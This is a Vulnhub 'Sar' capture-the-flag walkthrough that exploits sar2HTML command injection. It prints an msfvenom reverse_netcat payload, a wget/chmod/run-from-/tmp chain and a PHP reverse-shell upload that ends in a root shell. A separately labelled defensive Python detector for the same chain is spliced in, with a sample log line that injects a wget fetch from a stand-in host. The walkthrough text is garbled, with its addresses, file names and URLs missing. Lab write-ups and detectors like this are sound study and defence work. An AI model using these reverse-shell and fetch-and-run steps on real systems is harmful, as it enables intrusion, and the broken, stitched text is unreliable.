Vulnhub – Sar Walkthrough

Scanning the target with nmap -A -T4 -p- -vv

The dirb scan gave us a robots.txt file, where we found a sar2HTML path:

I searched Searchsploit for Sar2HTML and got a result:

As we can see following the exploit explanation:

We can also view /etc/passwd file and see the users on the target machine:

Now let’s create a shell and upload it to the target. We need to start a listener and a SimpleHTTPServer:

msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT=1234 >

cd /tmp; wget; chmod 777; ./

In my case it uploaded but didn’t run, so I went back and ran it with bash /tmp/
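From the defender's side, the download, chmod and run-from-/tmp chain above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original walkthrough: a small detector that URL-decodes each query value and flags shell separators combined with those stages. The log lines, the parameter name `x`, the `index.php` path, the addresses and the file name `s.sh` are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Characters that let a second command follow the intended parameter value.
SEPARATOR = re.compile(r"[;|&`]|\$\(")
# Stages of the chain used in this walkthrough: fetch, chmod, run from /tmp.
STAGES = {
    "fetch": re.compile(r"\b(?:wget|curl)\b"),
    "chmod": re.compile(r"\bchmod\b"),
    "tmp_exec": re.compile(r"\bcd\s+/tmp\b|\b(?:bash|sh)\s+/tmp/"),
}

def scan(lines):
    """Return (client_ip, parameter, stages) for each suspicious query value."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m or "?" not in m["target"]:
            continue
        query = m["target"].split("?", 1)[1]
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote_plus(raw)  # decode %3B, %20 and '+' before matching
            if not SEPARATOR.search(value):
                continue  # tool names alone (e.g. a search for "wget") are ignored
            stages = tuple(sorted(s for s, rx in STAGES.items() if rx.search(value)))
            if stages:
                hits.append((m["ip"], name, stages))
    return hits

# Constructed sample log: two injected requests and two benign ones.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sar2HTML/index.php?x=%3Bcd+/tmp'
    '%3B+wget+http://198.51.100.7/s.sh%3B+chmod+777+s.sh%3B+./s.sh HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /sar2HTML/index.php?x=%3Bbash+/tmp/s.sh HTTP/1.1" 200 128',
    '192.0.2.55 - - [01/Jan/2024:10:02:00 +0000] '
    '"GET /sar2HTML/index.php?x=LINUX&host=web01 HTTP/1.1" 200 2048',
    '192.0.2.56 - - [01/Jan/2024:10:03:00 +0000] "GET /search?q=wget+manual HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Requiring a separator together with a stage keyword keeps ordinary queries that merely mention a tool name out of the results.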

Now we have 2 files one is and the other is

Now let’s upload a shell and run it with the help of, we upload the file php-reverse-shell.php and rename it to anything you want (exploit.php) and echo it inside the file

A few moments later we get a root shell back at the listener we are running:
